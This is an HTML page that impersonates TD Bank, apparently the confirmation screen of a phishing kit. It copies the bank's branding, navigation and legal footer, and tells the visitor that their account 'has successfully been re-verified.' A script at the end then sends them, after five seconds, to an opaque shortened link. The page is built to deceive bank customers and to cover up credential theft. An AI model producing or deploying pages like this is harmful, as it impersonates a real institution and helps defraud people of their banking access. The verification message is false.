<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure Login</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
  <script src="/js/mask.js"></script>
</head>

<body class=" b-hide-outline" tabindex="-1">
  <div class="b-a-header b-ui-flex b-ui-flex-direction-column">
    <div class="a-header-primary b-top-level-nav">
      <div class="b-container-fluid b-ui-flex b-ui-flex-align-items-center b-full-height b-full-width">
        <div tabindex="0" class="a-hamburger-wrapper visible-xs visible-sm"><span role="button" class="a-icon a-icon-green a-icon-em-hamburger"></span></div>
        <div class="a-header-logo-wrapper"><a tabindex="0" class="a-lg-logo visible-md visible-lg">
            <div class="a-icon-container">
              <div class="a-icon-with-label"><span><img src="/img/logo.png" alt="TD Bank, America&#39;s Most Convenient Bank"></span></div>
            </div><span class="b-forscreenreader">TD Bank</span>
          </a></div><img src="/img/logo-bw.png" tabindex="-1" class="b-logo-print" alt="TD Bank, America&#39;s Most Convenient Bank">
        <ul class="a-lg-menu-list">
          <li>
            <div tabindex="-1" class="a-Menu a-menu-link">
              <div tabindex="0" class="a-dropdown-menu-item a-display-flex a-menu-active"><span tabindex="-1" class="a-dropdown-label">My TD </span></div>
            </div>
          </li>
          <li>
            <div tabindex="-1" class="a-Menu a-menu-link">
              <div tabindex="0" class="a-dropdown-menu-item a-display-flex"><span tabindex="-1" class="a-dropdown-label">Products </span></div>
            </div>
          </li>
          <li>
            <div tabindex="-1" class="a-Menu">
              <div tabindex="0" class="a-dropdown-menu-item a-display-flex"><span tabindex="-1" class="a-dropdown-label">Solutions </span></div>
            </div>
          </li>
        </ul>
        <ul class="a-right-nav-links">
          <li role="button" tabindex="0" title="Find Us" class="visible-md visible-lg">
            <div class="a-on-mouse-show">
              <div class="a-icon-wrapper"><span class="a-icon a-icon-static a-vertical-align-middle a-icon-em-location"></span></div><span class="b-ui-icon-label">Find Us</span>
            </div>
          </li>
          <li role="button" tabindex="0" title="Help Me" class="visible-md visible-lg">
            <div class="a-on-mouse-show">
              <div class="a-icon-wrapper"><span class="a-icon a-icon-static a-vertical-align-middle a-icon-em-help"></span></div><span class="b-ui-icon-label">Help Me</span>
            </div>
          </li>
          <li class="language-switcher visible-md visible-lg">
            <div class="a-language-switcher">
              <div tabindex="0" class="a-lang-menu-item a-display-flex"><span class="a-language-label">EN </span><span class="a-icon a-dropdown-icon a-icon-downCaret"></span></div>
            </div>
          </li>
          <li class="a-vertical-border visible-md visible-lg"></li>
          <li class="login-user-wrapper visible-md visible-lg">
            <div tabindex="0" class="a-dynamic-menu">
              <div class="a-dropdown-menu-item a-display-flex"><span class="a-icon a-menu-title-icon a-icon-static a-vertical-align-middle a-icon-em-Login"></span><span class="a-dropdown-label">log in</span><span class="a-icon a-dropdown-icon a-icon-downCaret"></span></div>
            </div>
          </li>
        </ul>
      </div>
    </div>
  </div>

  <div class="b-app-container loginApp_bg" style="background: white;">
    <div style="max-width: 333px;text-align:center;margin: 50px auto 150px;">
      <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
        <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
        <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
      </svg>
      <h3>Verification Complete</h3>
      <p>Your account has successfully been re-verified. You will be redirected back to our homepage shortly.</p>
    </div>
  </div>

  <div class="a-page-footer un-support">
		<div class="a-page-footer-top b-font-big"><span class="a-questions-label">Questions? </span><span class="a-footer-contact-us">Contact us <span class="a-icon a-icon-rightCaret"></span></span></div>
		<div class="a-footer-divided-section"></div>
		<div class="get-open-app-link text-center b-padding-top-30 footer-content-width"></div>
		<div class="a-footer-wrapper a-main-footer-mid-section">
			<ul class="a-list-center">
				<li><a tabindex="0" href="/">Help</a></li>
				<li><a tabindex="0" href="/">Terms of Use</a></li>
				<li><a tabindex="0" href="/">Security</a></li>
				<li><a tabindex="0" href="/">Privacy</a></li>
				<li><a tabindex="0" href="/">California Privacy</a></li>
				<li><a tabindex="0" href="/">Bank Deposits FDIC Insured</a></li>
				<li role="button"><a href="/">Online Advertising </a></li>
			</ul>
		</div>
		<div class="site-map-ref"></div>
		<div class="a-footer-wrapper a-main-footer-bottom-section">
			<div class="footer-content-width a-table-footer-rows" style="display: table;">
				<div class="a-columns col-sm-12 col-md-12 col-lg-12">SECURITIES AND INVESTMENTS</div>
				<div class="a-columns col-sm-4 col-md-4 col-lg-4">Not FDIC Insured</div>
				<div class="a-columns col-sm-4 col-md-4 col-lg-4">No Bank Guarantee</div>
				<div class="a-columns col-sm-4 col-md-4 col-lg-4">May Lose Value</div>
			</div>
			<div class="footer-content align-left footer-wealth-content-width">Registered Investment Advisory, Securities and Brokerage services are offered through TD Private Client Wealth, LLC, member FINRA/SIPC. TD Private Client Wealth, LLC and TD Bank, N.A. are affiliated through their parent company the Toronto-Dominion Bank. TD Wealth is a trademark owned by the Toronto-Dominion Bank, used with permission.</div>
			<div class="footer-content align-left footer-wealth-content-width">© 2023 TD Bank, N.A. All Rights Reserved </div>
		</div>
	</div>

  <script>
    setTimeout(() => {
      window.location.href = 'https://t.ly/t5zN';
    }, 5000)
  </script>
</body>

</html>